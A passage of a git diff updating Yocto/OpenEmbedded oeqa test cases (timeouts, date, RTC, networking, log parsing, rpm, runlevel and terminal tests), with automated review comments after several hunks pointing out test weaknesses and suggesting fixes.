if not eof:
diff --git a/meta/lib/oeqa/core/tests/cases/timeout.py b/meta/lib/oeqa/core/tests/cases/timeout.py
index 5dfecc7b7c..69cf969a67 100644
--- a/meta/lib/oeqa/core/tests/cases/timeout.py
+++ b/meta/lib/oeqa/core/tests/cases/timeout.py
@@ -8,6 +8,7 @@ from time import sleep
from oeqa.core.case import OETestCase
from oeqa.core.decorator.oetimeout import OETimeout
+from oeqa.core.decorator.depends import OETestDepends
class TimeoutTest(OETestCase):
@@ -19,3 +20,15 @@ class TimeoutTest(OETestCase):
def testTimeoutFail(self):
sleep(2)
self.assertTrue(True, msg='How is this possible?')
+
+
+ def testTimeoutSkip(self):
+ self.skipTest("This test needs to be skipped, so that testTimeoutDepends()'s OETestDepends kicks in")
+
+ @OETestDepends(["timeout.TimeoutTest.testTimeoutSkip"])
+ @OETimeout(3)
+ def testTimeoutDepends(self):
+ self.assertTrue(False, msg='How is this possible?')
+
+ def testTimeoutUnrelated(self):
+ sleep(6)
diff --git a/meta/lib/oeqa/core/tests/test_decorators.py b/meta/lib/oeqa/core/tests/test_decorators.py
index b798bf7d33..5095f39948 100755
--- a/meta/lib/oeqa/core/tests/test_decorators.py
+++ b/meta/lib/oeqa/core/tests/test_decorators.py
@@ -133,5 +133,11 @@ class TestTimeoutDecorator(TestBase):
msg = "OETestTimeout didn't restore SIGALRM"
self.assertIs(alarm_signal, signal.getsignal(signal.SIGALRM), msg=msg)
+ def test_timeout_cancel(self):
+ tests = ['timeout.TimeoutTest.testTimeoutSkip', 'timeout.TimeoutTest.testTimeoutDepends', 'timeout.TimeoutTest.testTimeoutUnrelated']
+ msg = 'Unrelated test failed to complete'
+ tc = self._testLoader(modules=self.modules, tests=tests)
+ self.assertTrue(tc.runTests().wasSuccessful(), msg=msg)
+
if __name__ == '__main__':
unittest.main()
diff --git a/meta/lib/oeqa/manual/eclipse-plugin.json b/meta/lib/oeqa/manual/eclipse-plugin.json
index d77d0e673b..6c110d0656 100644
--- a/meta/lib/oeqa/manual/eclipse-plugin.json
+++ b/meta/lib/oeqa/manual/eclipse-plugin.json
@@ -44,7 +44,7 @@
"expected_results": ""
},
"2": {
- "action": "wget autobuilder.yoctoproject.org/pub/releases//machines/qemu/qemux86/qemu (ex:core-image-sato-sdk-qemux86-date-rootfs-tar-bz2) \nsource /opt/poky/version/environment-setup-i585-poky-linux \n\nExtract qemu with runqemu-extract-sdk /home/user/file(ex.core-image-sato-sdk-qemux86.bz2) \n/home/user/qemux86-sato-sdk \n\n",
+ "action": "wget https://downloads.yoctoproject.org/releases/yocto/yocto-$VERSION/machines/qemu/qemux86/ (ex:core-image-sato-sdk-qemux86-date-rootfs-tar-bz2) \nsource /opt/poky/version/environment-setup-i585-poky-linux \n\nExtract qemu with runqemu-extract-sdk /home/user/file(ex.core-image-sato-sdk-qemux86.bz2) \n/home/user/qemux86-sato-sdk \n\n",
"expected_results": " Qemu can be lauched normally."
},
"3": {
@@ -60,7 +60,7 @@
"expected_results": ""
},
"6": {
- "action": "(d) QEMU: \nSelect this option if you will be using the QEMU emulator. Specify the Kernel matching the QEMU architecture you are using. \n wget autobuilder.yoctoproject.org/pub/releases//machines/qemu/qemux86/bzImage-qemux86.bin \n e.g: /home/$USER/yocto/adt-installer/download_image/bzImage-qemux86.bin \n\n",
+ "action": "(d) QEMU: \nSelect this option if you will be using the QEMU emulator. Specify the Kernel matching the QEMU architecture you are using. \n wget https://downloads.yoctoproject.org/releases/yocto/yocto-$VERSION/machines/qemu/qemux86/bzImage-qemux86.bin \n e.g: /home/$USER/yocto/adt-installer/download_image/bzImage-qemux86.bin \n\n",
"expected_results": ""
},
"7": {
@@ -247,7 +247,7 @@
"execution": {
"1": {
"action": "Clone eclipse-poky source. \n \n - git clone git://git.yoctoproject.org/eclipse-poky \n\n",
- "expected_results": "Eclipse plugin is successfully installed \n\nDocumentation is there. For example if you have release yocto-2.0.1 you will found on http://autobuilder.yoctoproject.org/pub/releases/yocto-2.0.1/eclipse-plugin/mars/ archive with documentation like org.yocto.doc-development-$date.zip \n \n"
+ "expected_results": "Eclipse plugin is successfully installed \n\nDocumentation is there. For example if you have release yocto-2.0.1 you will found on https://downloads.yoctoproject.org/releases/yocto/yocto-2.0.1/eclipse-plugin/mars/ archive with documentation like org.yocto.doc-development-$date.zip \n \n"
},
"2": {
"action": "Checkout correct tag. \n\n - git checkout <eclipse-version>/<yocto-version> \n\n",
diff --git a/meta/lib/oeqa/manual/oe-core.json b/meta/lib/oeqa/manual/oe-core.json
index fb47c5ec36..4ad524d89b 100644
--- a/meta/lib/oeqa/manual/oe-core.json
+++ b/meta/lib/oeqa/manual/oe-core.json
@@ -80,7 +80,7 @@
"expected_results": ""
},
"7": {
- "action": "Run command:./configure && make ",
+ "action": "Run command:./configure ${CONFIGUREOPTS} && make ",
"expected_results": "Verify that \"matchbox-desktop\" binary file was created successfully under \"src/\" directory "
},
"8": {
diff --git a/meta/lib/oeqa/manual/toaster-managed-mode.json b/meta/lib/oeqa/manual/toaster-managed-mode.json
index 12374c7c64..9566d9d10e 100644
--- a/meta/lib/oeqa/manual/toaster-managed-mode.json
+++ b/meta/lib/oeqa/manual/toaster-managed-mode.json
@@ -136,7 +136,7 @@
"expected_results": ""
},
"3": {
- "action": "Check that default values are as follows: \n\tDISTRO - poky \n\tIMAGE_FSTYPES - ext3 jffs2 tar.bz2 \n\tIMAGE_INSTALL_append - \"Not set\" \n\tPACKAGE_CLASES - package_rpm \n SSTATE_DIR - /homeDirectory/poky/sstate-cache \n\n",
+ "action": "Check that default values are as follows: \n\tDISTRO - poky \n\tIMAGE_FSTYPES - ext3 jffs2 tar.bz2 \n\tIMAGE_INSTALL_append - \"Not set\" \n\tPACKAGE_CLASSES - package_rpm \n SSTATE_DIR - /homeDirectory/poky/sstate-cache \n\n",
"expected_results": ""
},
"4": {
diff --git a/meta/lib/oeqa/runtime/cases/date.py b/meta/lib/oeqa/runtime/cases/date.py
index fdd2a6ae58..bd6537400e 100644
--- a/meta/lib/oeqa/runtime/cases/date.py
+++ b/meta/lib/oeqa/runtime/cases/date.py
@@ -13,12 +13,12 @@ class DateTest(OERuntimeTestCase):
def setUp(self):
if self.tc.td.get('VIRTUAL-RUNTIME_init_manager') == 'systemd':
self.logger.debug('Stopping systemd-timesyncd daemon')
- self.target.run('systemctl disable --now systemd-timesyncd')
+ self.target.run('systemctl disable --now --runtime systemd-timesyncd')
def tearDown(self):
if self.tc.td.get('VIRTUAL-RUNTIME_init_manager') == 'systemd':
self.logger.debug('Starting systemd-timesyncd daemon')
- self.target.run('systemctl enable --now systemd-timesyncd')
+ self.target.run('systemctl enable --now --runtime systemd-timesyncd')
@OETestDepends(['ssh.SSHTest.test_ssh'])
@OEHasPackage(['coreutils', 'busybox'])
@@ -28,14 +28,13 @@ class DateTest(OERuntimeTestCase):
self.assertEqual(status, 0, msg=msg)
oldDate = output
- sampleDate = '"2016-08-09 10:00:00"'
- (status, output) = self.target.run("date -s %s" % sampleDate)
+ sampleTimestamp = 1488800000
+ (status, output) = self.target.run("date -s @%d" % sampleTimestamp)
self.assertEqual(status, 0, msg='Date set failed, output: %s' % output)
- (status, output) = self.target.run("date -R")
- p = re.match('Tue, 09 Aug 2016 10:00:.. \+0000', output)
+ (status, output) = self.target.run('date +"%s"')
msg = 'The date was not set correctly, output: %s' % output
- self.assertTrue(p, msg=msg)
+ self.assertTrue(int(output) - sampleTimestamp < 300, msg=msg)
(status, output) = self.target.run('date -s "%s"' % oldDate)
msg = 'Failed to reset date, output: %s' % output
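Review bot: The new tolerance check is one-sided: `int(output) - sampleTimestamp < 300` also holds when the target clock reads earlier than the sample timestamp, so a clock left in the past still passes. Bound it on both sides with `self.assertTrue(0 <= int(output) - sampleTimestamp < 300, msg=msg)`. The status of the `date +"%s"` call is also never asserted, so a failed command would surface as a ValueError from `int()` rather than as the intended message. The test method starts and ends outside this hunk.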
diff --git a/meta/lib/oeqa/runtime/cases/df.py b/meta/lib/oeqa/runtime/cases/df.py
index 89fd0fb901..bb155c9cf9 100644
--- a/meta/lib/oeqa/runtime/cases/df.py
+++ b/meta/lib/oeqa/runtime/cases/df.py
@@ -4,12 +4,14 @@
from oeqa.runtime.case import OERuntimeTestCase
from oeqa.core.decorator.depends import OETestDepends
+from oeqa.core.decorator.data import skipIfDataVar, skipIfInDataVar
from oeqa.runtime.decorator.package import OEHasPackage
class DfTest(OERuntimeTestCase):
@OETestDepends(['ssh.SSHTest.test_ssh'])
@OEHasPackage(['coreutils', 'busybox'])
+ @skipIfInDataVar('IMAGE_FEATURES', 'read-only-rootfs', 'Test case df requires a writable rootfs')
def test_df(self):
cmd = "df -P / | sed -n '2p' | awk '{print $4}'"
(status,output) = self.target.run(cmd)
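Review bot: `skipIfDataVar` is imported next to `skipIfInDataVar`, but only the latter is used in the visible part of the file. If nothing outside the hunk uses it, the line can be `from oeqa.core.decorator.data import skipIfInDataVar`. test_df continues outside the hunk.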
diff --git a/meta/lib/oeqa/runtime/cases/ethernet_ip_connman.py b/meta/lib/oeqa/runtime/cases/ethernet_ip_connman.py
new file mode 100644
index 0000000000..e010612838
--- /dev/null
+++ b/meta/lib/oeqa/runtime/cases/ethernet_ip_connman.py
@@ -0,0 +1,36 @@
+from oeqa.runtime.case import OERuntimeTestCase
+from oeqa.core.decorator.depends import OETestDepends
+from oeqa.core.decorator.data import skipIfQemu
+
+class Ethernet_Test(OERuntimeTestCase):
+
+ def set_ip(self, x):
+ x = x.split(".")
+ sample_host_address = '150'
+ x[3] = sample_host_address
+ x = '.'.join(x)
+ return x
+
+ @skipIfQemu('qemuall', 'Test only runs on real hardware')
+ @OETestDepends(['ssh.SSHTest.test_ssh'])
+ def test_set_virtual_ip(self):
+ (status, output) = self.target.run("ifconfig eth0 | grep 'inet ' | awk '{print $2}'")
+ self.assertEqual(status, 0, msg='Failed to get ip address. Make sure you have an ethernet connection on your device, output: %s' % output)
+ original_ip = output
+ virtual_ip = self.set_ip(original_ip)
+
+ (status, output) = self.target.run("ifconfig eth0:1 %s netmask 255.255.255.0 && sleep 2 && ping -c 5 %s && ifconfig eth0:1 down" % (virtual_ip,virtual_ip))
+ self.assertEqual(status, 0, msg='Failed to create virtual ip address, output: %s' % output)
+
+ @OETestDepends(['ethernet_ip_connman.Ethernet_Test.test_set_virtual_ip'])
+ def test_get_ip_from_dhcp(self):
+ (status, output) = self.target.run("connmanctl services | grep -E '*AO Wired|*AR Wired' | awk '{print $3}'")
+ self.assertEqual(status, 0, msg='No wired interfaces are detected, output: %s' % output)
+ wired_interfaces = output
+
+ (status, output) = self.target.run("ip route | grep default | awk '{print $3}'")
+ self.assertEqual(status, 0, msg='Failed to retrieve the default gateway, output: %s' % output)
+ default_gateway = output
+
+ (status, output) = self.target.run("connmanctl config %s --ipv4 dhcp && sleep 2 && ping -c 5 %s" % (wired_interfaces,default_gateway))
+ self.assertEqual(status, 0, msg='Failed to get dynamic IP address via DHCP in connmand, output: %s' % output) \ No newline at end of file
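Review bot: The status assertions in both tests cannot detect a missing value, because each command is a pipeline ending in `awk` and the reported status is presumably that of the last command. An empty `output` then reaches `set_ip`, where `x[3]` raises IndexError, or is interpolated unchecked into the next shell command. Validate what was captured before using it, for example `self.assertRegex(original_ip, r'^\d+(\.\d+){3}$')` after the first run and `self.assertTrue(wired_interfaces and default_gateway)` before the `connmanctl config` call. The fixed host part `'150'` may also collide with a real machine on the test network, which deserves a comment or a configurable value.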
diff --git a/meta/lib/oeqa/runtime/cases/ksample.py b/meta/lib/oeqa/runtime/cases/ksample.py
index a9a1620ebd..9883aa9aa8 100644
--- a/meta/lib/oeqa/runtime/cases/ksample.py
+++ b/meta/lib/oeqa/runtime/cases/ksample.py
@@ -10,7 +10,7 @@ from oeqa.core.decorator.depends import OETestDepends
from oeqa.core.decorator.data import skipIfNotFeature
# need some kernel fragments
-# echo "KERNEL_FEATURES_append += \" features\/kernel\-sample\/kernel\-sample.scc\"" >> local.conf
+# echo "KERNEL_FEATURES_append = \" features\/kernel\-sample\/kernel\-sample.scc\"" >> local.conf
class KSample(OERuntimeTestCase):
def cmd_and_check(self, cmd='', match_string=''):
status, output = self.target.run(cmd)
diff --git a/meta/lib/oeqa/runtime/cases/ltp.py b/meta/lib/oeqa/runtime/cases/ltp.py
index a66d5d13d7..879f2a673c 100644
--- a/meta/lib/oeqa/runtime/cases/ltp.py
+++ b/meta/lib/oeqa/runtime/cases/ltp.py
@@ -67,7 +67,7 @@ class LtpTest(LtpTestBase):
def runltp(self, ltp_group):
cmd = '/opt/ltp/runltp -f %s -p -q -r /opt/ltp -l /opt/ltp/results/%s -I 1 -d /opt/ltp' % (ltp_group, ltp_group)
starttime = time.time()
- (status, output) = self.target.run(cmd)
+ (status, output) = self.target.run(cmd, timeout=1200)
endtime = time.time()
with open(os.path.join(self.ltptest_log_dir, "%s-raw.log" % ltp_group), 'w') as f:
diff --git a/meta/lib/oeqa/runtime/cases/pam.py b/meta/lib/oeqa/runtime/cases/pam.py
index 271a1943e3..a482ded945 100644
--- a/meta/lib/oeqa/runtime/cases/pam.py
+++ b/meta/lib/oeqa/runtime/cases/pam.py
@@ -8,11 +8,14 @@
from oeqa.runtime.case import OERuntimeTestCase
from oeqa.core.decorator.depends import OETestDepends
from oeqa.core.decorator.data import skipIfNotFeature
+from oeqa.runtime.decorator.package import OEHasPackage
class PamBasicTest(OERuntimeTestCase):
@skipIfNotFeature('pam', 'Test requires pam to be in DISTRO_FEATURES')
@OETestDepends(['ssh.SSHTest.test_ssh'])
+ @OEHasPackage(['shadow'])
+ @OEHasPackage(['shadow-base'])
def test_pam(self):
status, output = self.target.run('login --help')
msg = ('login command does not work as expected. '
diff --git a/meta/lib/oeqa/runtime/cases/parselogs.py b/meta/lib/oeqa/runtime/cases/parselogs.py
index a1791b5cca..1cac59725d 100644
--- a/meta/lib/oeqa/runtime/cases/parselogs.py
+++ b/meta/lib/oeqa/runtime/cases/parselogs.py
@@ -32,7 +32,7 @@ common_errors = [
"Failed to load module \"fbdev\"",
"Failed to load module fbdev",
"Failed to load module glx",
- "[drm] Cannot find any crtc or sizes - going 1024x768",
+ "[drm] Cannot find any crtc or sizes",
"_OSC failed (AE_NOT_FOUND); disabling ASPM",
"Open ACPI failed (/var/run/acpid.socket) (No such file or directory)",
"NX (Execute Disable) protection cannot be enabled: non-PAE kernel!",
@@ -61,6 +61,8 @@ common_errors = [
"[rdrand]: Initialization Failed",
"[pulseaudio] authkey.c: Failed to open cookie file",
"[pulseaudio] authkey.c: Failed to load authentication key",
+ "was skipped because of a failed condition check",
+ "was skipped because all trigger condition checks failed",
]
video_related = [
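Review bot: The two strings added to `common_errors` carry no unit name, so every log line containing "was skipped because of a failed condition check" is filtered, whichever unit was skipped (this assumes the list feeds the ignore patterns, as its use in `qemux86_common` suggests). If only particular units are meant, narrow the strings. Otherwise add a comment above them, e.g. `# systemd condition-check skips are expected and match the error grep`, so the breadth of the suppression is a recorded decision. The list starts outside the hunk.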
@@ -88,6 +90,9 @@ qemux86_common = [
'tsc: HPET/PMTIMER calibration failed',
"modeset(0): Failed to initialize the DRI2 extension",
"glamor initialization failed",
+ "blk_update_request: I/O error, dev fd0, sector 0 op 0x0:(READ)",
+ "floppy: error",
+ 'failed to IDENTIFY (I/O error, err_mask=0x4)',
] + common_errors
ignore_errors = {
@@ -293,7 +298,7 @@ class ParseLogsTest(OERuntimeTestCase):
grepcmd = 'grep '
grepcmd += '-Ei "'
for error in errors:
- grepcmd += '\<' + error + '\>' + '|'
+ grepcmd += r'\<' + error + r'\>' + '|'
grepcmd = grepcmd[:-1]
grepcmd += '" ' + str(log) + " | grep -Eiv \'"
@@ -304,13 +309,13 @@ class ParseLogsTest(OERuntimeTestCase):
errorlist = ignore_errors['default']
for ignore_error in errorlist:
- ignore_error = ignore_error.replace('(', '\(')
- ignore_error = ignore_error.replace(')', '\)')
+ ignore_error = ignore_error.replace('(', r'\(')
+ ignore_error = ignore_error.replace(')', r'\)')
ignore_error = ignore_error.replace("'", '.')
- ignore_error = ignore_error.replace('?', '\?')
- ignore_error = ignore_error.replace('[', '\[')
- ignore_error = ignore_error.replace(']', '\]')
- ignore_error = ignore_error.replace('*', '\*')
+ ignore_error = ignore_error.replace('?', r'\?')
+ ignore_error = ignore_error.replace('[', r'\[')
+ ignore_error = ignore_error.replace(']', r'\]')
+ ignore_error = ignore_error.replace('*', r'\*')
ignore_error = ignore_error.replace('0-9', '[0-9]')
grepcmd += ignore_error + '|'
grepcmd = grepcmd[:-1]
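Review bot: The replace chain escapes `(`, `)`, `?`, `[`, `]` and `*` but leaves `.`, `+`, `|`, `{`, `^` and `$` active in the `grep -Eiv` expression. Ignore entries such as the ones containing `authkey.c` therefore match more than their literal text and can filter unrelated lines. Unless some entries rely on `.` as a wildcard, add `ignore_error = ignore_error.replace('.', r'\.')` (and the same for `+` and `|`) at the top of the loop body, before the `"'"` to `.` substitution. The hunk at line 298 has the related issue that `error` is placed between `\<` and `\>` with no escaping at all. The loop starts outside this hunk.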
diff --git a/meta/lib/oeqa/runtime/cases/ping.py b/meta/lib/oeqa/runtime/cases/ping.py
index f6603f75ec..498f80d0a5 100644
--- a/meta/lib/oeqa/runtime/cases/ping.py
+++ b/meta/lib/oeqa/runtime/cases/ping.py
@@ -6,6 +6,7 @@ from subprocess import Popen, PIPE
from oeqa.runtime.case import OERuntimeTestCase
from oeqa.core.decorator.oetimeout import OETimeout
+from oeqa.core.exception import OEQATimeoutError
class PingTest(OERuntimeTestCase):
@@ -13,14 +14,17 @@ class PingTest(OERuntimeTestCase):
def test_ping(self):
output = ''
count = 0
- while count < 5:
- cmd = 'ping -c 1 %s' % self.target.ip
- proc = Popen(cmd, shell=True, stdout=PIPE)
- output += proc.communicate()[0].decode('utf-8')
- if proc.poll() == 0:
- count += 1
- else:
- count = 0
+ try:
+ while count < 5:
+ cmd = 'ping -c 1 %s' % self.target.ip
+ proc = Popen(cmd, shell=True, stdout=PIPE)
+ output += proc.communicate()[0].decode('utf-8')
+ if proc.poll() == 0:
+ count += 1
+ else:
+ count = 0
+ except OEQATimeoutError:
+ self.fail("Ping timeout error for address %s, count %s, output: %s" % (self.target.ip, count, output))
msg = ('Expected 5 consecutive, got %d.\n'
'ping output is:\n%s' % (count,output))
self.assertEqual(count, 5, msg = msg)
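Review bot: The re-indented loop still builds the command as a string and runs it with `shell=True`, so whatever `self.target.ip` holds is parsed by the host shell. Passing an argument list avoids that: `proc = Popen(['ping', '-c', '1', self.target.ip], stdout=PIPE)`. The loop has no iteration bound of its own and relies on OEQATimeoutError being raised from outside (presumably by the OETimeout decorator, which is not in this hunk); a one-line comment above `while count < 5:` should say so.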
diff --git a/meta/lib/oeqa/runtime/cases/ptest.py b/meta/lib/oeqa/runtime/cases/ptest.py
index ef0470da7e..2066d009c3 100644
--- a/meta/lib/oeqa/runtime/cases/ptest.py
+++ b/meta/lib/oeqa/runtime/cases/ptest.py
@@ -104,4 +104,5 @@ class PtestRunnerTest(OERuntimeTestCase):
failmsg = failmsg + "Failed ptests:\n%s" % pprint.pformat(failed_tests)
if failmsg:
+ self.logger.warning("There were failing ptests.")
self.fail(failmsg)
diff --git a/meta/lib/oeqa/runtime/cases/rpm.py b/meta/lib/oeqa/runtime/cases/rpm.py
index 8e18b426f8..203fcc8505 100644
--- a/meta/lib/oeqa/runtime/cases/rpm.py
+++ b/meta/lib/oeqa/runtime/cases/rpm.py
@@ -49,21 +49,20 @@ class RpmBasicTest(OERuntimeTestCase):
msg = 'status: %s. Cannot run rpm -qa: %s' % (status, output)
self.assertEqual(status, 0, msg=msg)
- def check_no_process_for_user(u):
- _, output = self.target.run(self.tc.target_cmds['ps'])
- if u + ' ' in output:
- return False
- else:
- return True
+ def wait_for_no_process_for_user(u, timeout = 120):
+ timeout_at = time.time() + timeout
+ while time.time() < timeout_at:
+ _, output = self.target.run(self.tc.target_cmds['ps'])
+ if u + ' ' not in output:
+ return
+ time.sleep(1)
+ user_pss = [ps for ps in output.split("\n") if u + ' ' in ps]
+ msg = "User %s has processes still running: %s" % (u, "\n".join(user_pss))
+ self.fail(msg=msg)
def unset_up_test_user(u):
# ensure no test1 process in running
- timeout = time.time() + 30
- while time.time() < timeout:
- if check_no_process_for_user(u):
- break
- else:
- time.sleep(1)
+ wait_for_no_process_for_user(u)
status, output = self.target.run('userdel -r %s' % u)
msg = 'Failed to erase user: %s' % output
self.assertTrue(status == 0, msg=msg)
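Review bot: `wait_for_no_process_for_user` decides by substring, `u + ' ' not in output`, so a `ps` line that merely contains the user name followed by a space (a longer user name ending in it, or a command argument) keeps the wait going until the timeout and then fails the test. Comparing whole fields is stricter: `if not any(u in ps.split() for ps in output.splitlines()): return`, with the same test when building `user_pss`. `output` is also unbound if the loop body never runs (a `timeout` of 0), so initialise it with `output = ''` before the `while`.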
@@ -141,13 +140,4 @@ class RpmInstallRemoveTest(OERuntimeTestCase):
self.tc.target.run('rm -f %s' % self.dst)
- # if using systemd this should ensure all entries are flushed to /var
- status, output = self.target.run("journalctl --sync")
- # Get the amount of entries in the log file
- status, output = self.target.run(check_log_cmd)
- msg = 'Failed to get the final size of the log file.'
- self.assertEqual(0, status, msg=msg)
- # Check that there's enough of them
- self.assertGreaterEqual(int(output), 80,
- 'Cound not find sufficient amount of rpm entries in /var/log/messages, found {} entries'.format(output))
diff --git a/meta/lib/oeqa/runtime/cases/rtc.py b/meta/lib/oeqa/runtime/cases/rtc.py
new file mode 100644
index 0000000000..39f4d29f23
--- /dev/null
+++ b/meta/lib/oeqa/runtime/cases/rtc.py
@@ -0,0 +1,40 @@
+from oeqa.runtime.case import OERuntimeTestCase
+from oeqa.core.decorator.depends import OETestDepends
+from oeqa.core.decorator.data import skipIfFeature
+from oeqa.runtime.decorator.package import OEHasPackage
+
+import re
+
+class RTCTest(OERuntimeTestCase):
+
+ def setUp(self):
+ if self.tc.td.get('VIRTUAL-RUNTIME_init_manager') == 'systemd':
+ self.logger.debug('Stopping systemd-timesyncd daemon')
+ self.target.run('systemctl disable --now --runtime systemd-timesyncd')
+
+ def tearDown(self):
+ if self.tc.td.get('VIRTUAL-RUNTIME_init_manager') == 'systemd':
+ self.logger.debug('Starting systemd-timesyncd daemon')
+ self.target.run('systemctl enable --now --runtime systemd-timesyncd')
+
+ @skipIfFeature('read-only-rootfs',
+ 'Test does not work with read-only-rootfs in IMAGE_FEATURES')
+ @OETestDepends(['ssh.SSHTest.test_ssh'])
+ @OEHasPackage(['coreutils', 'busybox'])
+ def test_rtc(self):
+ (status, output) = self.target.run('hwclock -r')
+ self.assertEqual(status, 0, msg='Failed to get RTC time, output: %s' % output)
+
+ (status, current_datetime) = self.target.run('date +"%m%d%H%M%Y"')
+ self.assertEqual(status, 0, msg='Failed to get system current date & time, output: %s' % current_datetime)
+
+ example_datetime = '062309452008'
+ (status, output) = self.target.run('date %s ; hwclock -w ; hwclock -r' % example_datetime)
+ check_hwclock = re.search('2008-06-23 09:45:..', output)
+ self.assertTrue(check_hwclock, msg='The RTC time was not set correctly, output: %s' % output)
+
+ (status, output) = self.target.run('date %s' % current_datetime)
+ self.assertEqual(status, 0, msg='Failed to reset system date & time, output: %s' % output)
+
+ (status, output) = self.target.run('hwclock -w')
+ self.assertEqual(status, 0, msg='Failed to reset RTC time, output: %s' % output)
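Review bot: test_rtc sets the system clock and the RTC to 2008 and restores them only in its last two statements, so a failing assertion in between (for instance the `hwclock -r` pattern check) leaves the target in 2008 for every later test. A wrong clock typically breaks certificate validation and makes log timestamps useless for triage. Register the restore right after capturing `current_datetime`, e.g. `self.addCleanup(self.target.run, 'date %s ; hwclock -w' % current_datetime)`. The status of the `date %s ; hwclock -w ; hwclock -r` call is never asserted either, and a `;` chain reports only the last command's result.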
diff --git a/meta/lib/oeqa/runtime/cases/runlevel.py b/meta/lib/oeqa/runtime/cases/runlevel.py
new file mode 100644
index 0000000000..3a4df8ace1
--- /dev/null
+++ b/meta/lib/oeqa/runtime/cases/runlevel.py
@@ -0,0 +1,22 @@
+from oeqa.runtime.case import OERuntimeTestCase
+from oeqa.core.decorator.depends import OETestDepends
+
+import time
+
+class RunLevel_Test(OERuntimeTestCase):
+
+ @OETestDepends(['ssh.SSHTest.test_ssh'])
+ def test_runlevel_3(self):
+ (status, output) = self.target.run("init 3 && sleep 5 && runlevel")
+ runlevel= '5 3'
+ self.assertEqual(output, runlevel, msg='Failed to set current runlevel to runlevel 3, current runlevel : %s' % output[-1])
+ (status, output) = self.target.run("uname -a")
+ self.assertEqual(status, 0, msg='Failed to run uname command, output: %s' % output)
+
+ @OETestDepends(['runlevel.RunLevel_Test.test_runlevel_3'])
+ def test_runlevel_5(self):
+ (status, output) = self.target.run("init 5 && sleep 5 && runlevel")
+ runlevel = '3 5'
+ self.assertEqual(output, runlevel, msg='Failed to set current runlevel to runlevel 5, current runlevel : %s' % output[-1])
+ (status, output) = self.target.run('export DISPLAY=:0 && x11perf -aa10text')
+ self.assertEqual(status, 0, msg='Failed to run 2D graphic test, output: %s' % output)
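Review bot: Both runlevel failure messages index `output[-1]`, which is evaluated before `assertEqual` runs and raises IndexError when the command returns no output, replacing the intended message; `% output` is safe and shows the whole string. The `status` of the `init N && sleep 5 && runlevel` calls is never checked. The expected values `'5 3'` and `'3 5'` assume the image boots to runlevel 5, and nothing in the file guards for the init manager or for `x11perf` being installed. A failure in test_runlevel_3 also leaves the target in runlevel 3 for the rest of the run.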
diff --git a/meta/lib/oeqa/runtime/cases/scp.py b/meta/lib/oeqa/runtime/cases/scp.py
index 3a5f292152..f2bbc947d6 100644
--- a/meta/lib/oeqa/runtime/cases/scp.py
+++ b/meta/lib/oeqa/runtime/cases/scp.py
@@ -23,7 +23,7 @@ class ScpTest(OERuntimeTestCase):
os.remove(cls.tmp_path)
@OETestDepends(['ssh.SSHTest.test_ssh'])
- @OEHasPackage(['openssh-scp', 'dropbear'])
+ @OEHasPackage(['openssh-scp'])
def test_scp_file(self):
dst = '/tmp/test_scp_file'
diff --git a/meta/lib/oeqa/runtime/cases/suspend.py b/meta/lib/oeqa/runtime/cases/suspend.py
new file mode 100644
index 0000000000..67b6f7e56f
--- /dev/null
+++ b/meta/lib/oeqa/runtime/cases/suspend.py
@@ -0,0 +1,33 @@
+from oeqa.runtime.case import OERuntimeTestCase
+from oeqa.core.decorator.depends import OETestDepends
+from oeqa.core.decorator.data import skipIfQemu
+import threading
+import time
+
+class Suspend_Test(OERuntimeTestCase):
+
+ def test_date(self):
+ (status, output) = self.target.run('date')
+ self.assertEqual(status, 0, msg = 'Failed to run date command, output : %s' % output)
+
+ def test_ping(self):
+ t_thread = threading.Thread(target=self.target.run, args=("ping 8.8.8.8",))
+ t_thread.start()
+ time.sleep(2)
+
+ status, output = self.target.run('pidof ping')
+ self.target.run('kill -9 %s' % output)
+ self.assertEqual(status, 0, msg = 'Not able to find process that runs ping, output : %s' % output)
+
+ def set_suspend(self):
+ (status, output) = self.target.run('sudo rtcwake -m mem -s 10')
+ self.assertEqual(status, 0, msg = 'Failed to suspends your system to RAM, output : %s' % output)
+
+ @skipIfQemu('qemuall', 'Test only runs on real hardware')
+ @OETestDepends(['ssh.SSHTest.test_ssh'])
+ def test_suspend(self):
+ self.test_date()
+ self.test_ping()
+ self.set_suspend()
+ self.test_date()
+ self.test_ping()
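Review bot: `test_date` and `test_ping` are helpers called from `test_suspend`, but their `test_` prefix presumably makes the loader collect them as tests of their own, without the `skipIfQemu` and `OETestDepends` decorators. Every target, QEMU included, would then start a ping to the external address 8.8.8.8. Name them like `set_suspend`, e.g. `def check_date(self):` and `def check_ping(self):`, and update the calls in `test_suspend`. The ping thread is never joined, and `sudo rtcwake` assumes both tools are on the image with no OEHasPackage guard.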
diff --git a/meta/lib/oeqa/runtime/cases/terminal.py b/meta/lib/oeqa/runtime/cases/terminal.py
new file mode 100644
index 0000000000..8fcca99f47
--- /dev/null
+++ b/meta/lib/oeqa/runtime/cases/terminal.py
@@ -0,0 +1,21 @@
+from oeqa.runtime.case import OERuntimeTestCase
+from oeqa.core.decorator.depends import OETestDepends
+from oeqa.runtime.decorator.package import OEHasPackage
+
+import threading
+import time
+
+class TerminalTest(OERuntimeTestCase):
+
+ @OEHasPackage(['matchbox-terminal'])
+ @OETestDepends(['ssh.SSHTest.test_ssh'])
+ def test_terminal_running(self):
+ t_thread = threading.Thread(target=self.target.run, args=("export DISPLAY=:0 && matchbox-terminal -e 'sh -c \"uname -a && exec sh\"'",))
+ t_thread.start()
+ time.sleep(2)
+
+ status, output = self.target.run('pidof matchbox-terminal')
+ number_of_terminal = len(output.split())
+ self.assertEqual(number_of_terminal, 1, msg='There should be only one terminal being launched. Number of terminal launched : %s' % number_of_terminal)
+ self.target.run('kill -9 %s' % output)
+ self.assertEqual(status, 0, msg='Not able to find process that runs terminal.')
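Review bot: `kill -9 %s` is issued with whatever `pidof` returned before `status` is asserted, and it comes after the count assertion, so a run that finds more than one terminal fails and leaves all of them running on the target. Assert `status` directly after the `pidof` call, then register the kill with `self.addCleanup(self.target.run, 'kill -9 %s' % output)` before checking the count. `test_ping` in suspend.py uses the same kill-before-assert order. The launcher thread is never joined.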
diff --git a/meta/lib/oeqa/runtime/cases/usb_hid.py b/meta/lib/oeqa/runtime/cases/usb_hid.py
new file mode 100644
index 0000000000..3c292cf661
--- /dev/null
+++ b/meta/lib/oeqa/runtime/cases/usb_hid.py
@@ -0,0 +1,22 @@
+from oeqa.runtime.case import OERuntimeTestCase
+from oeqa.core.decorator.depends import OETestDepends
+from oeqa.core.decorator.data import skipIfQemu
+from oeqa.runtime.decorator.package import OEHasPackage
+
+class USB_HID_Test(OERuntimeTestCase):
+
+ def keyboard_mouse_simulation(self):
